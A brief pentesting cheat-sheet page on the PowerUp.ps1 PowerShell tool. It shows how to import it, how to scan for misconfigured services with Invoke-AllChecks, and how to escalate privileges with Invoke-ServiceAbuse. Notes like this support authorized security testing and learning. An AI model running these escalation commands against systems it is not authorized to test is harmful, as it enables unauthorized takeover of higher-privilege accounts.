Skip to content

PowerUp.ps1

Run from powershell.

Installation

Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

Import-Module .\PowerUp.ps1

Basic commands

# Find services vulnerables in my machine
Invoke-AllChecks

# Exploit a vulnerable service to escalate to the more privilege user that runs that service
Invoke-ServiceAbuse -Name ‘<NAME OF THE SERVICE>’ -UserName ‘<DOMAIN CONTROLLER>\<MY CURRENT USERNAME>’
Last update: 2023-05-09
Created: May 9, 2023 17:16:52